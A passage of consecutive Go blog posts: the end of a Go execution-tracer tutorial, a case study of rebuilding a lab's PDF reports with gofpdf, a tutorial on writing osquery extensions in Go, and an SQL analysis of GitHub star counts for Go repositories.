    The most complex, powerful and interactive visualization shows a timeline of the entire program execution. This view displays, for example, what was running on each of the virtual processors and what was blocked waiting to run. We will dive deeper into this visualization later in this post. Only works on chrome.

  2. Goroutine analysis

    Shows how many of each kind of goroutines were created during the entire execution. After selecting a kind it is possible to see information about each goroutine of that kind. For example, how long each goroutine was blocked while trying to acquire a lock on a mutex, reading from the network, running and etc.

  3. Network/Sync/Syscall blocking profile

    These contain graphs that displays how long goroutines spent blocked on each of these resources. They are pretty close to the ones available on memory/cpu profiler on pprof. This is the perfect place to look to investigate lock contentions, for example.

  4. Scheduler latency profiler

    Provides timing for scheduler level information showing where time is most spent scheduling.

View Trace

Clicking on the “View trace” linking, one is presented with a screen full of information about the whole program execution.

Press “?” to get a list of available shortcuts to help navigating the trace.

The following image highlights the most important parts and each section is described below:

View trace

  1. Timeline

    Shows the time during the execution and the units of time may change depending on the navigation. One can navigate the timeline by using keyboard shortcuts (WASD keys, just like video games).

  2. Heap

    Shows memory allocations during the execution, this can be really useful to find memory leaks and to check how much memory the garbage collection is being able to free at each run.

  3. Goroutines

    Shows how many goroutines are running and how many are runnable (waiting to be scheduled) at each point in time. A high number of runnable goroutines may indicate scheduling contention, e.g, when the program creates too many goroutines and is causing the scheduler to work too hard.

  4. OS Threads

    Shows how many OS threads are being used and how many are blocked by syscalls.

  5. Virtual Processors

    Shows a line for each virtual processor. The number of virtual processors is controlled by the GOMAXPROCS environment variable (defaulting to the number of cores).

  6. Goroutines and events

    Displays where/what goroutine is running on each virtual processor. Lines connecting goroutines represent events. In the example image, we can see that the goroutine “G1 runtime.main” spawned two different goroutines: G6 and G5 (the former is the goroutine responsible for collecting the trace data and the latter is the one we started using the “go” keyword).

    A second row per processor may show additional events such as syscalls and runtime events. This also includes some work that the goroutine does on behalf of the runtime (e.g assisting the garbage collector).

The image below shows information obtained when selecting a particular goroutine.

View goroutine

This information includes:

  • Its “name” (Title)
  • When it started (Start)
  • Its duration (Wall Duration)
  • The stack trace when it started
  • The stack trace when it finished
  • Events generated by this goroutine

We can see that this goroutine created two events: the tracer goroutine and the goroutine that started to send the number 42 on the channel.

View event

By clicking on a particular event (a line in the graph or by selecting the event after clicking on the goroutine), we can see:

  • The stack trace when the event started
  • The duration of the event
  • Goroutines involved in the event

One may click on these goroutines to navigate to their trace data.

Blocking profiles

Another particular view available from a trace are the network/synchronization/syscall blocking profiles. Blocking profiles shows a graph view similar to those available on memory/cpu profiles from pprof. The difference is that instead of showing how much memory each function allocated, those profiles show how long each goroutine spent blocking on a particular resource.

The image below shows the “Synchronization blocking profile” for our sample code.

View trace

This shows us that our main goroutine spent 12.08 microseconds blocked receiving from a channel. This kind of graph is a great way to find lock contentions, when too many goroutines are competing to obtain a lock on a resource.

Collecting Traces

There are three ways to collect tracing information:

  1. Using the runtime/trace pkg

This involved calling trace.Start and trace.Stop and was covered in our “Hello, Tracing” example.

  1. Using -trace=<file> test flag

This is useful to collect trace information about code being tested and the test itself.

  1. Using debug/pprof/trace handler

This is the best method to collect tracing from a running web application.

Tracing a web application

To be able to collect traces from a running web application written in go, one needs to add the /debug/pprof/trace handler. The following code sample shows how this can be done for the http.DefaultServerMux: by simply importing the net/http/pprof package.

package main

import (
	"net/http"
	_ "net/http/pprof"
)

func main() {
	http.Handle("/hello", http.HandlerFunc(helloHandler))

	http.ListenAndServe("localhost:8181", http.DefaultServeMux)
}

func helloHandler(w http.ResponseWriter, r *http.Request) {
	w.Write([]byte("hello world!"))
}

To collect the traces we need to issue a request to the endpoint, e.g, curl localhost:8181/debug/pprof/trace?seconds=10 > trace.out. This request will block for 10 seconds and the trace data will written to the file trace.out. A trace generated like this can be viewed the same way as we did before: go tool trace trace.out.

Security note: beware that exposing pprof handlers to the Internet is not advisable. The recommendation is to expose these endpoints on a different http.Server that is only bound to the loopback interface. This blog post discusses the risks and has code samples on how to properly expose pprof handlers.

Before gathering the trace, let’s start by generating some load on our service using wrk:

$ wrk -c 100 -t 10 -d 60s http://localhost:8181/hello

This will use 100 connections across 10 threads to make requests during 60 seconds. While wrk is running, we can collect 5s of trace data using curl localhost:8181/debug/pprof/trace?seconds=5 > trace.out. This generated a 5MB file (this can quickly grow if we are able to generate more load) on my 4 CPU machine.

Once again, opening the trace is done by the go tool trace command: go tool trace trace.out. As the tool parses the entire content of the file, this will take longer than our previous example. When it completes, the page looks slightly different:

View trace (0s-2.546634537s)
View trace (2.546634537s-5.00392737s)

Goroutine analysis
Network blocking profile
Synchronization blocking profile
Syscall blocking profile
Scheduler latency profile

To guarantee that the browser will be able to render everything, the tool has divided the trace into two continuous parts. Busier applications or longer traces may require the tool to split this in even more parts.

Clicking on “View trace (2.546634537s-5.00392737s)” we can see that there is a lot going on:

View trace web

This particular screenshot shows a GC run that starts at between 1169ms and 1170ms and ends right after 1174ms. During this time, an OS thread (PROC 1) ran a goroutine dedicated to the GC while other goroutines assisted in some GC phases (these are displayed on lines bellow the goroutine and are read MARK ASSIST). By the end of the screenshot, we can see that most of the allocated memory was freed by the GC.

Another particular useful information is the number of goroutines that are in “Runnable” state (13 on the selected time): if this number becomes large over time this can indicate that we need more CPUs to handle the load.

Conclusions

The tracer is a powerful tool for debugging concurrency issues, e.g, contentions and logical races. But it does not solve all problems: it is not the best tool available to track down what piece of code is spending most CPU time or allocations. The go tool pprof is better suited for these use cases.

The tool really shines when you want to understand the behavior of a program over time and to know what each goroutine is doing when NOT running. Collecting traces may have some overhead and can generate a high amount of data to be inspected.

Unfortunately, official documentation is lacking so some experimentation is needed to try and understand what the tracer is showing. This is also an opportunity for contributions to the official documentation and to the community in general (e.g blog posts).

André is a Sr. Software Engineer at Globo.com, working on Tsuru. @andresantostc on twitter, https://andrestc.com on the web

Reference

  1. Go execution tracer (design doc)
  2. Using the go tracer to speed fractal rendering
  3. Go tool trace
  4. Your pprof is showing
2017-12-22

This article is about how we at Mendelics changed our report system from Python to Go using gofpdf library, why we did this change, how we planned it and some insights we got along the way.

Some Context

Before I dive into some technical aspects let me introduce to you guys what Mendelics does. Mendelics is Brazilian laboratory which process DNA analysis in order to find genetic diseases. We use a technique called NGS (Next Generation Sequencing) to process blood samples and at the end of some steps we input all the DNA information into a Go application in a human readable way.

Our physicians will analyse this data and generate a report, basically a PDF file, which will be sent to the patient after a few days.

Our Architecture

Regarding the reports our application was split in two parts:

  • Python API which holds patient’s data, exams information and other business logic;
  • Go application used by physicians to analyse medical information and “create the report”;

I added quotes into “create the report” because under the hood the Go application just send a POST to the Python API to generate it. At this point the Go application doesn’t know how to create a report at all.

Below there is an image which explain it in a better way.

The Python API will use the metadata sent before to create the PDF when the endpoint /report/XPTO is called. In this particular case XPTO is the exam identifier.

Our Problem

The reports was built using Report Lab, a great python library used by players like NASA and Wikipedia, but the way we used it makes changes into report’s structure a nightmare.

Our reports are using background/foreground structure, which maps to a predefined PDF template (background) and the data you wish to add on it (foreground).

Above you see an example of our background template. It worked for a while, but our requirements changed and our reports got more and more complicated. Everytime we need to add/remove a field, for instance, we need to redesign all those kinds of reports because the foreground data needs to be re-aligned over and over again.

Can you imagine other problems that we had using this approach? Let me list a few:

  • Page limit;
  • Text limit;
  • Tables with prefixed rows length;
  • No custom layout;

Our Solution

We want to rewrite it in Go.

Since our main application is written in Go and it’s the only application which needs to know about reports why not to move report’s logic to this end? It’s makes sense, but is there any good Go library out there which is easy to use and handles our known problems in a good way?

The answer is gofpdf.

A great library ported from PHP which have good support for everything we needed at this time. So let’s plan this change.

Proof of Concept

We’ve created a new repo to check if we could reproduce the hardest report using gofpdf and to understand the trade-offs with this new approach.

To start we need to get it as any Go library using go get github.com/jung-kurt/gofpdf

With the library downloaded, the code to create our POC is very simple.

We created a function NewReport and inside of it we configured how this document will looks like (e.g. font family, font color, page size, header and footer data). Let’s look into it:

func NewReport() *Report {
	pdf := gofpdf.New("P", "mm", "A4", "./assets/fonts")
	html := pdf.HTMLBasicNew()
	encodingFunc := pdf.UnicodeTranslatorFromDescriptor("")

	pdf.AddFont("ProximaNova", "", "ProximaNova-Reg-webfont.json")
	pdf.AddFont("ProximaNova", "B", "ProximaNova-Bold-webfont.json")
	pdf.AddFont("ProximaNova-Light", "", "ProximaNova-Light-webfont.json")

	report := &Report{
		htmlContent:  html,
		encodingFunc: encodingFunc,
	}

	pdf.SetFont("ProximaNova", "", fontPtSize)
	pdf.SetTextColor(75, 75, 80)
	pdf.AliasNbPages("")
	pdf.SetHeaderFunc(report.headerFunc)
	pdf.SetFooterFunc(report.footerFunc)

	report.document = pdf
	return report
}

Our struct Report just holds the configured document as you can see in the last line before actually return it.

The idea here is just to show how simple is to create your documents using this library. You could check the docs to understand what each function does. Let’s move one step further.

The main code lives in a HandleFunc, which was created just to be able to see this PDF using a browser instead of generating it in the file system.

http.HandleFunc("/report", func(w http.ResponseWriter, r *http.Request) {
    report := NewReport()
    report.PatientHeader()
    report.Diagnostic()
    report.GeneList()
    report.TechnicalResponsible()
    report.Method()
    report.QualityFlags()
    report.VUS()
    report.Comments()


    if err := report.document.Output(w); err != nil {
        log.Print(err)
    }
})

Each function in the report object (created by our NewReport as we saw above) is a section builder for that given name. We build the patient header, with information like name, age, etc, diagnostic section which is where we explain if the patient has a positive or negative result for that specific exam and so on.

Let’s get the Method function to see how it works under the hood.

func (r *Report) Method() {
	fs := 10.0
	r.document.SetFontSize(fs)

	content := "Captura de exons com Nextera Exome Capture seguida por sequenciamento de nova " +
		"geração com Illumina HiSeq. Alinhamento e identificação de variantes utilizando protocolos " +
		"de bioinformática, tendo como referência a versão GRCh37 do genoma humano. Análise médica " +
		"orientada pelas informações que motivaram a realização deste exame."

	r.drawLine(fs, "<b>Método</b>", 10)

	// MultiCell(width, height, content, border, align, fill)
	r.document.MultiCell(0, 5, r.encodingFunc(content), "", "", false)
	r.lineStroke()
}

We just set the font size for that section, build a text for it and add it to the document using the MultiCell function. Easy! No x/y alignment, text limit, etc. The library will handle it based on our previous configuration at NewReport.

Going back to the main function, at the end we write the final document back to the ResposeWriter and we’re done!

Below you could see the result of this POC: a report 99% similar to what we have in python in just 351 LOC:

From Python to Go

As we saw previously, we need to change how Python and Go communicate with each other. Instead of sending an application/pdf as before, now the python API needs to serve all the data needed to construct the report on the Go side.

We created a new endpoint to serve this new information as we can see below:

With the API ready we changed how our Go application called it. Instead of calling the API to build the report now we’re calling the model endpoint in order to get the metadata necessary to construct it in our end.

model, err := api.GetModel(code, user)

if err != nil {
    msg := "unable to get report model"
    logrus.WithFields(logrus.Fields{
        "code":  code,
        "user":  user,
        "error": err,
    }).Error(msg)
    http.Error(w, msg, http.StatusInternalServerError)
}

After that we pass this data to our report object:

if err := report.New(model).Output(w); err != nil {
    msg := "unable to generate report"
    logrus.WithFields(logrus.Fields{
        "code":  code,
        "error": err,
    }).Error(msg)
    http.Error(w, msg, http.StatusInternalServerError)
}

Did you see how this code is very similar with the one from our POC? Yes, you got this right, we just basically copy&paste these code from POC to our application and just remove the hardcode part related to how we build each section. The Output function is pretty much the same:

func (r *Report) Output(w io.Writer) error {
	if err := r.Error(); err != nil {
		r.document.SetError(err)
		return r.document.Output(w)
	}

	r.patientHeader()
	r.diagnostic()
	r.geneList()
	r.method()
	r.qualityFlags()
	r.vusSection()
	r.comments()
	r.additionalInformation()

	return r.document.Output(w)
}

Bonus: Unit Test For PDF

Your methods to build each PDF’s section are fully tested, but what if I change something like font color, an image position or another visual thing? How can I get feedback about it?

In our case, let’s say we change accidentally the color of an arbitrary element. The right document was:

and now it looks like this:

The Mistake

We changed the background color of an element in the right corner.

Without any unit tests we need to check all documents by eye to guarantee we didn’t break anything, but the library provides an awesome way to test our PDF files! Please check the unit tests inside the library to get the whole idea.

In our end our tests will alarm if we made a mistake like above:

Conclusion

I strongly recommend to you gofpdf if you need to build PDFs in Go.

Also today we can create any kind of project using Go not limited to CLI and APIs and even code that doesn’t need to rely on channels and goroutines to get the job done.

I’m very happy with the Go ecosystem so far and looking forward to see what the community can build using it.

2017-12-21

What if you could use SQL to query any aspect of your infrastructure? Osquery, an open source instrumentation tool released by the Facebook security team allows you to do just that.

For example, SELECT network_name, last_connected, captive_portal FROM wifi_networks WHERE captive_portal=1; will show all captive portal WiFi networks that a laptop has connected to. And SELECT * FROM processes WHERE on_disk = 0; will show any process that is running where the binary has been deleted from disk. When the root password vulnerability became know a few weeks ago, the osquery community quickly crafted a query which would identify vulnerable macs in a fleet of devices. With almost 200 tables available by default and support for macOS, Linux and Windows hosts, osquery is the tool of choice for many security and system administration teams.

Osquery is a powerful tool, but it’s written in C++, so why are we talking about it in a GopherAcademy post? Osquery uses Thrift (a project similar to gRPC) to allow developers to extend osquery through a series of plugin types. Earlier this year our team at Kolide released a set of Go packages with idiomatic interfaces that allow anyone to use the full power of Go to extend osquery. In this blog post, it’s my goal to show you how you can get started with osquery development using the osquery-go SDK.

Writing a custom logger plugin

When a scheduled query like SELECT name, version from deb_packages is executed, the osqueryd daemon will create a JSON log event with the results of the query. By default, a filesystem plugin is used, which logs the results to a local file. Commonly oquery users use aggregation tools like filebeat to send the result logs to a centralized log platform. Other plugins exist too. The tls plugin sends all logs to a remote TLS server like Fleet. The kinesis plugin sends logs results to AWS, allowing advanced monitoring with applications like StreamAlert. But what if you already have a well established logging pipeline with the systemd journal, Splunk, fluentd or any number of proprietary logging systems. With the Thrift bindings to osquery, you can write your own logger. Go, having support for most APIs these days, is an ideal language for implementing a logger.

For the purpose of this tutorial, we’ll implement a systemd journal logger. The go-systemd library from CoreOS has a convenient package we can use to write to journald.

The github.com/kolide/osquery-go/plugin/logger package exposes the following API which we need to implement.

type Plugin struct {}

type LogFunc func(ctx context.Context, typ LogType, log string) error

func NewPlugin(name string, fn LogFunc) *Plugin

To create our own logger, we have to implement a function that satisfies the signature of LogFunc.

For journald the function looks like this:

func JournalLog(_ context.Context, logType logger.LogType, logText string) error {
        return journal.Send(
                logText,
                journal.PriInfo,
                map[string]string{"OSQUERY_LOG_TYPE": logType.String()},
        )
}

Now we can call logger.NewPlugin("journal", JournalLog) to get back a functioning osquery plugin we can register with the Thrift extension server.

Configuring osquery to use our custom extension

We have implemented a logger plugin, but we still have to link it to osqueryd. Osquery has a few specific requirements for registering plugins. Plugins must be be packaged as executables, called extensions. A single extension can bundle one or more plugins. We’ll use a package main to create an extension.

Osquery will call our extension with 4 possible CLI flags, the most important of which is the unix socket we’ll use to communicate back to the process.

        var (
                flSocketPath = flag.String("socket", "", "")
                flTimeout    = flag.Int("timeout", 0, "")
                _            = flag.Int("interval", 0, "")
                _            = flag.Bool("verbose", false, "")
        )
        flag.Parse()

We’ll ignore the interval and verbose flag in this extension, but they still have to be parsed to avoid an error.

Next, we’ll add time.Sleep(2 * time.Second) to wait for the unix socket to become available. In production code we would add a retry with a backoff.

Once the extension file is available, we can bind to the socket by creating a ExtensionManagerServer. The extension will use the socket path provided to us by the osquery process.

        server, err := osquery.NewExtensionManagerServer(
                "go_extension_tutorial",
                *flSocketPath,
                osquery.ServerTimeout(time.Duration(*flTimeout)*time.Second),
        )
        if err != nil {
                log.Fatalf("Error creating extension: %s\n", err)
        }

Next, we can create our logger and register it with the server.

       journal := logger.NewPlugin("journal", JournalLog)
       server.RegisterPlugin(journal)

Finally, we can run the extension. The server.Run() method will block until an error is returned.

      log.Fatal(server.Run())

Now that we created our package main, we can build the binary and start osqueryd with the custom logger. Osquery has a few requirements for executables we have to follow:

  • The executable must have a .ext file extension.
  • The executable path should be added to an extensions.load file which can be passed to the osqueryd --extensions_autoload CLI flag.
  • The extension must be owned by the same user that is running osquery, and the permissions must be read+exec only. This is a precaution against an attacker replacing an extension executable that the osqueryd process runs as root. For development, you can use the --allow_unsafe flag, but we won’t need it here since we’ll be running the osquery process as our current user account.

Putting it all together we get:

echo "$(pwd)/build/tutorial-extension.ext" > /tmp/extensions.load
go build -i -o build/tutorial-extension.ext
osqueryd \
  --extensions_autoload=/tmp/extensions.load \
  --pidfile=/tmp/osquery.pid \
  --database_path=/tmp/osquery.db \
  --extensions_socket=/tmp/osquery.sock \
  --logger_plugin=journal

Immediately we can see our logger working with journalctl

sudo journalctl OSQUERY_LOG_TYPE=status -o export -f |awk -F'MESSAGE=' '/MESSAGE/ {print $2}'

{"s":0,"f":"events.cpp","i":825,"m":"Event publisher not enabled: audit: Publisher disabled via configuration","h":"dev","c":"Mon Dec 18 03:34:31 2017 UTC","u":1513568071}
{"s":0,"f":"events.cpp","i":825,"m":"Event publisher not enabled: syslog: Publisher disabled via configuration","h":"dev","c":"Mon Dec 18 03:34:31 2017 UTC","u":1513568071}
{"s":0,"f":"scheduler.cpp","i":75,"m":"Executing scheduled query foobar: SELECT 1","h":"dev","c":"Mon Dec 18 03:34:38 2017 UTC","u":1513568078}

Adding tables to osquery

Loggers are great, but what if we need to implement a custom table? Let’s stick with the go-systemd package and prototype a systemd table which will list the systemd units and their state.

The github.com/kolide/osquery-go/plugin/table package has a similar API to that of the logger plugin.

type Plugin struct {}

type GenerateFunc func(ctx context.Context, queryContext QueryContext) ([]map[string]string, error)

type ColumnDefinition struct {
    Name string
    Type ColumnType
}

func NewPlugin(name string, columns []ColumnDefinition, gen GenerateFunc) *Plugin

The ColumnDefinition struct defines four SQL column types: TEXT, INTEGER, BIGINT and DOUBLE. To create the table, we’ll have to implement the GenerateFunc which returns the table as a []map[string]string.

We’ll implement the required Generate function using the dbus package, which has a helpful ListUnits() method.

Note: I’m using package globals and ignoring errors to keep the example code short. The full implementation is linked at the end of this post.

var conn *dbus.Conn

func generateSystemdUnitStatus(_ context.Context, _ table.QueryContext) ([]map[string]string, error) {
        units, _ := conn.ListUnits()
        var results []map[string]string
        for _, unit := range units {
                // get the pid value
                var pid int
                p, _ := conn.GetServiceProperty(unit.Name, "MainPID")
                pid = int(p.Value.Value().(uint32))

                // get the stdout path of the service unit
                var stdoutPath string
                p, _ := conn.GetServiceProperty(unit.Name, "StandardOutput")
                stdoutPath = p.Value.String()

                //... a few more getters like this
                // then populate the table rows
                results = append(results, map[string]string{
                        "name":         unit.Name,
                        "load_state":   unit.LoadState,
                        "active_state": unit.ActiveState,
                        "exec_start":   execStart,
                        "pid":          strconv.Itoa(pid),
                        "stdout_path":  stdoutPath,
                        "stderr_path":  stderrPath,
                })
        }
    return results, nil
}

Now we can create the osquery-go *table.Plugin:

func SystemdTable() *table.Plugin {
        columns := []table.ColumnDefinition{
                table.TextColumn("name"),
                table.IntegerColumn("pid"),
                table.TextColumn("load_state"),
                table.TextColumn("active_state"),
                table.TextColumn("exec_start"),
                table.TextColumn("stdout_path"),
                table.TextColumn("stderr_path"),
        }
        return table.NewPlugin("systemd", columns, generateSystemdUnitStatus)
}

Back in our func main, we can register this plugin with the server, similar to how we registered the logger plugin.

systemd := SystemdTable()
server.RegisterPlugin(systemd)

We can now use the systemd service in our queries.

osquery> SELECT process.start_time, systemd.name AS service, process.name, listening.address, listening.port, process.pid FROM processes AS process JOIN listening_ports AS listening ON (process.pid = listening.pid) JOIN systemd ON systemd.pid = process.pid and listening.port = 443;
+------------+------------------+----------+---------+------+-------+
| start_time | service          | name     | address | port | pid   |
+------------+------------------+----------+---------+------+-------+
| 6308708    | nignx.service    | nginx    | ::      | 443  | 25859 |
+------------+------------------+----------+---------+------+-------+

By configuring the query to run on a schedule, and using the logger plugin to aggregate the results centrally, we can begin to instrument our systems and create alerts.

Speaking of configuration, how are you configuring the osquery process? The recommended way is a configuration management tool like Chef, or a dedicated TLS server like Fleet, but maybe you’ve got custom requirements?

Config plugins for osquery

Just like you can log results with a custom logger, you can load configuration through a custom plugin. We’ll implement a plugin which configures the osquery process and schedules a list of schedules queries to run. To keep things simple, we’ll load configuration from a GitHub gist.

By now, you can probably guess what the API of the github.com/kolide/osquery-go/plugin/config looks like.

type Plugin struct {}

type GenerateConfigsFunc func(ctx context.Context) (map[string]string, error)

func NewPlugin(name string, fn GenerateConfigsFunc) *Plugin

Here, we implement the GenerateConfigs function to return one or more config sources as a map, where each value represents the full config JSON file as a string.

var client *github.Client

func (p *Plugin) GenerateConfigs(ctx context.Context) (map[string]string, error) {
        gistID := os.Getenv("OSQUERY_CONFIG_GIST")

        gist, _, err := client.Gists.Get(ctx, p.gistID)
        if err != nil {
                return nil, errors.Wrap(err, "get config gist")
        }
        var config string
        if file, ok := gist.Files["osquery.conf"]; ok {
                config = file.GetContent()
        } else {
                return nil, fmt.Errorf("no osquery.conf file in gist %s", p.gistID)
        }
        return map[string]string{"gist": config}, nil
}

One thing I want to highlight here is that our plugin needs it’s own configuration.

gistID := os.Getenv("OSQUERY_CONFIG_GIST")

You might need to provide configuration like API keys to your plugin, and environment variables provide a convenient way of doing that.

Now that we’ve created the plugin, one thing left to do is register it inside func main and restart osqueryd.

gistConfig := config.NewPlugin("gist", GenerateConfigs)
server.RegisterPlugin(gistConfig)

Restart the osqueryd daemon with two new flags. A refresh interval (in seconds) and the config plugin to use instead of the default filesystem one.

--config_refresh=60 \
--config_plugin=gist

Conclusion

In the article I’ve given an overview of osquery and how to use the Go plugin SDK to write your own custom extensions. Besides creating the plugins we also have to think about packaging, distribution and the platforms we’re running the osquery daemon on. For example, the journal and systemd APIs are not available on macOS or windows, so we have to compile our custom extensions in a different way for each platform. Once again, Go makes this process easy by allowing us to use build tags when writing platform specific plugins.

At Kolide, we’ve been writing our own open source osqueryd extension called Launcher. Launcher implements config, logger and other pugins for osquery using gRPC and the Go kit toolkit to effectively manage osqueryd at scale for various environments. If you’ve found this article interesting, I encourage you to check out the Launcher source. The osquery has a vibrant community of users and developers, most of which hang out on Slack. In addition to the Go SDK, a similar one is available for python.

I’ve described three plugin types logger, table and config, but there’s a fourth plugin type the osquery-go SDK allows you to write, and that’s a distributed plugin. What makes the distributed plugin interesting is that you can schedule queries and get query results from your whole fleet of endpoints in real time. While writing this blog post, I got the idea of implementing the distributed plugin as a Twitter bot. If you tweet a valid query with the #osqueryquery hash tag, you’ll get back a response with the results. Although I’ve left out the implementation of this final plugin from the article, It has a very similar API to the plugins I’ve described above.

You can check out the source of all the plugins above, and a few more examples in the Github repo that I’ve created for this post.

2017-12-20

In April 2017, I thought it would be fun to try setting up a system to track the star counts of the top 1000 Go repositories on GitHub. This article describes how I collected this data and some simple analysis of the dataset.

I want to be clear that this was for fun only and I’m not advocating that the number of stars a repository has is the be-all-end-all of its success. There’s many, many repositories I am not mentioning here that are high quality, useful code. There’s also tons of code that lives in private repositories outside GitHub or on Bitbucket and GitLab. In the context of this article, the stars on GitHub are a set of data used to explore the patterns people have when starring repositories.

Collecting the data

The collection of the stars could be an article all its own (and may become one elsewhere) so I will be brief.

The collection is done by a Lambda function on Amazon Web Services using a timer that triggers an execution every 15 minutes. The lambda function collects the star count of the top 1000 Go repositories, which is the maximum the GitHub search API will return. This is a post about Go, so the lambda function is written in… Python, of course! The total resource usage is well below the free tier limits, so running this function is free indefinitely.

The data that the lambda function collects is stored in a DynamoDB table that just holds the repo name, an integer timestamp (epoch time in seconds), and the number of stars at that time. By the time this article was started, I had several hundred megabytes of data in DynamoDB. As with the Lambda function, the usage here is below the free tier limit, so the storage is free as well. For reference, the allocated read and write capacity is 20 units each.

To get the data out of DynamoDB, I used the standard AWS Data Pipeline template. The AWS Documentation covers the process well. From there, I had to download it all locally using the AWS CLI and then write a program (this time in Go) to convert the many separate chunk files into one CSV file. This left me with a 726 MB CSV file.

The go program to do the CSV conversion is incredibly over-engineered, but it was fun to optimize while the next step completed.

I decided that a real database was going to be helpful in doing the analysis, so I set up Postgres locally and imported the giant CSV file into a table. The following is the schema and command to copy the CSV data into Postgres. This would be run at the psql command line.

drop table if exists github_stars;

create unlogged table github_stars (
    repo  varchar(255) not null,
    ts    integer      not null,
    stars integer      not null,
    constraint repo_ts primary key(repo,ts)
);

create index repo_idx  on github_stars(repo);
create index ts_idx    on github_stars(ts);
create index stars_idx on github_stars(stars);

\copy github_stars from 'github-stars.csv' csv

Let’s dig in

At the end of this (lengthy) import I was left with a relatively simple table that has 23,279,479 rows of data about 1412 separate repositories. Note that this number isn’t easily divided by 1000. That’s because the error handling was not extremely robust in the lambda. It’s designed for long term trends, not second-by-second updates. The number of tracked repositories is higher than 1000 because some repositories stayed the same and slipped out of view as others increased. Yet others increased rapidly from 0 to attain a relatively high position in the middle of tracking.

Total stars per repo

I started by looking at the distribution of total stars per repository. Getting the number of stars for each repository at the end of the sample period (for that repository) was fairly straightforward (but also fairly slow). The graph is the ordered list from rank 1 on down.

select gs.repo, gs.stars
from github_stars as gs
inner join (
    select repo, max(ts) as ts
    from github_stars
    group by repo
) as maxts
on gs.repo = maxts.repo and gs.ts = maxts.ts
order by gs.stars desc;

total_stars

Total star gain

All of the repositories in the tracked set gained a total of 533,614 stars over the tracking period. This was done by finding the min and max timestamp for each repository, getting the star counts at those times, finding the difference, and then summing all those differences.

select sum(maxs.stars-mins.stars) as total_increase
from (
    select gs.repo, gs.stars
    from github_stars as gs
    inner join (
        select repo, max(ts) as ts
        from github_stars
        group by repo
    ) as maxts
    on gs.repo = maxts.repo and gs.ts = maxts.ts
) as maxs
inner join (
    select gs.repo, gs.stars
    from github_stars as gs
    inner join (
        select repo, min(ts) as ts
        from github_stars
        group by repo
    ) as mints
    on gs.repo = mints.repo and gs.ts = mints.ts
) as mins
on maxs.repo = mins.repo;

Rate of star count increase

Through some SQL-fu I produced the sorted list of repositories by the number of stars they collected per day during the time they were tracked. Hold on to your hat for this SQL statement:

select rises.repo, cast(rise as float)/cast(run as float)*(24*60*60) as stars_per_day
from (
    select maxs.repo, maxs.stars-mins.stars as rise
    from (
        select gs.repo, gs.stars
        from github_stars as gs
        inner join (
            select repo, max(ts) as ts
            from github_stars
            group by repo
        ) as maxts
        on gs.repo = maxts.repo and gs.ts = maxts.ts
    ) as maxs
    inner join (
        select gs.repo, gs.stars
        from github_stars as gs
        inner join (
            select repo, min(ts) as ts
            from github_stars
            group by repo
        ) as mints
        on gs.repo = mints.repo and gs.ts = mints.ts
    ) as mins
    on maxs.repo = mins.repo
) as rises
inner join
(
    select repo, max(ts)-min(ts) as run
    from github_stars
    group by repo
) as runs
on rises.repo = runs.repo
where runs.run > 0
order by stars_per_day desc;

This produced a distribution much like others you see with this kind of data; there’s a few repositories in the fat section of the graph with the majority of the rate increase with a long tail of repos that are slowly increasing. There is one unfortunate repository that had a -24 out there at the end.

star_gain_per_day

Do bigger repositories grow faster?

I wanted to figure out if the larger repositories grow faster than smaller ones, so I grabbed the number of stars at the end of the tracking period for each repository and charted that against the number of stars increase per day. The SQL this time is a small tweak to the last one:

select rises.repo, rises.stars as stars,
cast(rise as float)/cast(run as float)*(24*60*60) as stars_per_day
from (
    select maxs.repo, maxs.stars, maxs.stars-mins.stars as rise
    from (
        select gs.repo, gs.stars
        from github_stars as gs
        inner join (
            select repo, max(ts) as ts
            from github_stars
            group by repo
        ) as maxts
        on gs.repo = maxts.repo and gs.ts = maxts.ts
    ) as maxs
    inner join (
        select gs.repo, gs.stars
        from github_stars as gs
        inner join (
            select repo, min(ts) as ts
            from github_stars
            group by repo
        ) as mints
        on gs.repo = mints.repo and gs.ts = mints.ts
    ) as mins
    on maxs.repo = mins.repo
) as rises
inner join
(
    select repo, max(ts)-min(ts) as run
    from github_stars
    group by repo
) as runs
on rises.repo = runs.repo
where runs.run > 0
order by stars desc;

spd_vs_total

Yes! they do, generally. Some smaller repositories have a higher rate, but the larger ones (for which there’s less data) are definitely trend higher. To make the data a little easier to see, a log scale can be used on both axes. There’s a definite split between the top repositories and the bottom ones.

spd_vs_total_log

Single Repository Graphs

One of the first things I did early on was to create a python script that pulls the data for any number of repositories and graph it using matplotlib. The details are can be found in the Python code, but the graphs are fun to look at:

docker and moby graph dominikh/go-tools graph Netflix/rend graph

External Effects

One of the more interesting things is seeing how external events can affect individual repositories greatly in the short term. Most projects have short-term jumps in star counts based on blog posts or other external events, like a talk at Gophercon or inclusion in one of the newsletters. That’s mostly speculation, I didn’t spend the time to do correlation.

Case in point: The first graph clearly shows a sharp rise in star count for moby/moby just after the name change from docker/docker and then a pretty linear rise after that.

Conclusions

  1. Bigger repositories do grow faster. There seems to be an inflection point around 5000 stars.
  2. Smaller repositories can also grow fast. The fastest were in the middle of the pack below the inflection point.
  3. Every project is different. Some will be stable and get less press and therefore grow less. Others are constantly being talked about.

Data

The final collected data (as of this writing) is 23,279,479 rows and over 750 MB raw and 100 MB gzipped. Unfortunately, the data is too big to just toss up on a website for download. I have provided all of my source code in links above, though, so anyone could easily set this up.

What next?

I haven’t turned it off, so in the time it took to read this article it’s likely collected another measurement. I plan on leaving it on for as long as I can. I also will likely adjust the lambda function to collect more kinds of data about the people starring repositories. I think looking at the groupings of repositories by people who starred them can uncover similarities between them, or at least show what kinds of things a given user is interested in.

If you’re interested in doing this kind of tracking (or just like playing with data), grab all the code linked above and start it running in your own AWS account. It’s (almost) free and you can have fun playing with the output. If anyone wants the source data or has any other questions, you can contact me on twitter or by email. Let me know what you thought and if you have ideas on what to do with all this data, let me know.

Twitter: @sgmansfield

GitHub: ScottMansfield

Email: sgmansf@gmail.com